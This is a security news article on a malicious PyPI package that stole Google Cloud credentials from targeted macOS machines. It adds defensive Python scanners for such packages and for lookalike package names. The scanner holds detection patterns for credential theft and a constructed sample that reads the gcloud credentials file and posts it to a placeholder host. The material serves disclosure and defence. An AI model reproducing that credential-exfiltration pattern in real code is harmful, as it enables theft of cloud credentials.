Malicious PyPI Package Targets macOS to Steal Google Cloud Credentials

Jul 27, 2024 | Newsroom | Cybersecurity / Cloud Security


Cybersecurity researchers have found a malicious package on the Python Package Index (PyPI) repository that targets Apple macOS systems with the goal of stealing users' Google Cloud credentials from a narrow pool of victims.

The package, named "lr-utils-lib," attracted a total of 59 downloads before it was taken down. It was uploaded to the registry in early June 2024.

"The malware uses a list of predefined hashes to target specific macOS machines and attempts to harvest Google Cloud authentication data," Checkmarx researcher Yehuda Gelb said in a Friday report. "The harvested credentials are sent to a remote server."


An important aspect of the package is that it first checks whether it has been installed on a macOS system, and only then proceeds to compare the system's Universally Unique Identifier (UUID) against a hard-coded list of 64 hashes.

If the compromised machine is among those specified in the predefined set, it attempts to access two files, namely application_default_credentials.json and credentials.db, located in the ~/.config/gcloud directory, which contain Google Cloud authentication data.


The captured information is then transmitted over HTTP to a remote server, "europe-west2-workload-422915[.]cloudfunctions[.]net."
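The behaviours described above (a macOS check, a UUID lookup, a hard-coded hash list, reads of the two gcloud credential files and an outbound HTTP request) are individually common but rarely appear together in one module. The following is an added example of a static indicator scan over installed package source, not Checkmarx's tooling or anything from the lr-utils-lib package; the indicator regexes, the scoring rule and both sample modules are constructed for the demonstration, and the upload URL in the sample is a placeholder.

```python
"""Static indicator scan for installed Python packages.

Added example, not Checkmarx's tooling: it looks for the combination of
behaviours the article attributes to lr-utils-lib (a macOS check, a hardware
UUID lookup, a hard-coded list of SHA-256-sized hashes, reads of the gcloud
credential files and an outbound HTTP request) in package source code.
The indicator patterns and the sample modules below are constructed.
"""
import re
import sys
from pathlib import Path

# One regex per behaviour. Any single hit is weak evidence on its own (plenty of
# legitimate tooling reads gcloud credentials), so is_suspicious() only flags a
# file that combines credential access with targeting logic AND an HTTP call.
INDICATORS = {
    "macos_gate": re.compile(
        r"platform\.system\(\)\s*==\s*['\"]Darwin['\"]|sys\.platform\s*==\s*['\"]darwin['\"]"
    ),
    "hardware_uuid": re.compile(r"IOPlatformUUID|uuid\.getnode\(\)"),
    # three or more consecutive 64-hex-char string literals: a hard-coded hash list
    "hash_list": re.compile(r"(['\"][0-9a-f]{64}['\"]\s*,\s*){3,}"),
    "gcloud_creds": re.compile(
        r"\.config/gcloud/(application_default_credentials\.json|credentials\.db)"
    ),
    "http_call": re.compile(
        r"requests\.post\(|urllib\.request\.urlopen\(|http\.client\.HTTPS?Connection\("
    ),
}


def scan_source(text: str) -> dict:
    """Return {indicator_name: matched?} for one module's source text."""
    return {name: rx.search(text) is not None for name, rx in INDICATORS.items()}


def is_suspicious(hits: dict) -> bool:
    """Flag only the full pattern: targeting logic + credential path + HTTP."""
    targeting = hits["macos_gate"] or hits["hardware_uuid"] or hits["hash_list"]
    return targeting and hits["gcloud_creds"] and hits["http_call"]


def scan_tree(root: Path) -> list:
    """Scan every .py file under root (e.g. a site-packages directory).
    Returns [(relative_path, [matched indicator names]), ...] for flagged files."""
    findings = []
    for path in sorted(root.rglob("*.py")):
        hits = scan_source(path.read_text(errors="replace"))
        if is_suspicious(hits):
            findings.append((str(path.relative_to(root)), [k for k, v in hits.items() if v]))
    return findings


# Constructed samples for demonstration; neither is real package code.
_FAKE_HASHES = ",\n    ".join('"%s"' % (c * 64) for c in "abcd")
SAMPLE_SUSPICIOUS = f'''
import os, platform, requests
TARGETS = [
    {_FAKE_HASHES},
]
if platform.system() == "Darwin":
    creds = os.path.expanduser("~/.config/gcloud/application_default_credentials.json")
    requests.post("https://EXAMPLE-PLACEHOLDER.invalid/upload", ...)  # sketch only
'''
SAMPLE_BENIGN = '''
import json, os
# a local helper that only reads the ADC file for its own use
path = os.path.expanduser("~/.config/gcloud/application_default_credentials.json")
adc = json.load(open(path))
'''

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for rel, names in scan_tree(Path(sys.argv[1])):
            print(f"SUSPICIOUS {rel}: {', '.join(names)}")
    else:
        for label, src in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
            print(label, "->", is_suspicious(scan_source(src)))
```

Run it against a site-packages directory (`python scan.py /path/to/site-packages`) after installing a dependency set into a throwaway virtual environment. The scan is a review aid, not a verdict: obfuscated or dynamically built strings will evade the regexes, and the conjunction rule is deliberately strict so that ordinary gcloud client libraries, which read the ADC file but carry no targeting logic, are not flagged.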

Checkmarx said it also found a fake profile on LinkedIn with the name "Lucid Zenith" that matched the package's owner and falsely claimed to be the CEO of Apex Companies, suggesting a possible social engineering element to the attack.

Exactly who is behind the campaign is currently not known. However, it comes more than two months after cybersecurity firm Phylum disclosed details of another supply chain attack involving a Python package called "requests-darwin-lite" that was also found to unleash its malicious actions after checking the UUID of the macOS host.

These campaigns are a sign that threat actors have prior knowledge of the macOS systems they want to infiltrate and are going to great lengths to ensure that the malicious packages are distributed only to those particular machines.

It also speaks to the tactics malicious actors employ to distribute lookalike packages, aiming to deceive developers into incorporating them into their applications.
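One cheap control against lookalike names is to compare every requirement against a trusted allow-list before installation. The following is an added example, not Checkmarx's or PyPI's tooling; it generalises beyond the article's two cases with two assumed rules: a name within one keystroke (insertion, deletion, substitution or adjacent transposition) of a trusted name, or a trusted name extended with a suffix, as in "requests-darwin-lite" versus "requests". The trusted set and the requirements file are constructed stand-ins.

```python
"""Lookalike (typosquat) check for a list of requirements.

Added example; not Checkmarx's or PyPI's tooling. The rules are assumptions
that generalise the article's cases: a name one keystroke away from a trusted
name, or a trusted name with an extra suffix ("requests-darwin-lite" versus
"requests"). TRUSTED is a constructed stand-in for an organisation's allow-list.
"""
import re

TRUSTED = {"requests", "urllib3", "numpy", "boto3", "google-cloud-storage"}


def normalize(name: str) -> str:
    """PEP 503 name normalisation: case-fold, collapse runs of -, _ and . to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def osa_distance(a: str, b: str) -> int:
    """Optimal-string-alignment distance: edits plus adjacent transpositions."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def lookalike_of(name: str, trusted=TRUSTED):
    """Return the trusted name this one resembles, or None.
    An exact (normalised) match is a trusted package, not a lookalike."""
    n = normalize(name)
    if n in trusted:
        return None
    for t in sorted(trusted):
        if n.startswith(t + "-") or osa_distance(n, t) <= 1:
            return t
    return None


def review_requirements(lines):
    """Map each flagged requirement name to its trusted twin (skips comments/blanks)."""
    flagged = {}
    for line in lines:
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        # strip version specifiers, extras and environment markers
        name = re.split(r"[<>=!~\[; ]", line, maxsplit=1)[0]
        twin = lookalike_of(name)
        if twin:
            flagged[name] = twin
    return flagged


# Constructed requirements file for the demo.
SAMPLE_REQUIREMENTS = """
requests==2.32.3
reqeusts            # transposed letters
requests-darwin-lite
numpy>=1.26
lr-utils-lib        # unknown name, resembles nothing trusted
"""

if __name__ == "__main__":
    for name, twin in review_requirements(SAMPLE_REQUIREMENTS.splitlines()).items():
        print(f"WARN {name!r} resembles trusted package {twin!r}")
```

Treat a hit as a review signal rather than a block: the suffix rule also catches legitimate extensions such as "requests-oauthlib", and a name that resembles nothing trusted (lr-utils-lib in the sample) passes silently, so the check complements, rather than replaces, reviewing unfamiliar packages before they are installed.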

"While it is not clear whether this attack targeted individuals or enterprises, these kinds of attacks can significantly impact enterprises," Gelb said. "While the initial compromise usually occurs on an individual developer's machine, the implications for enterprises can be substantial."
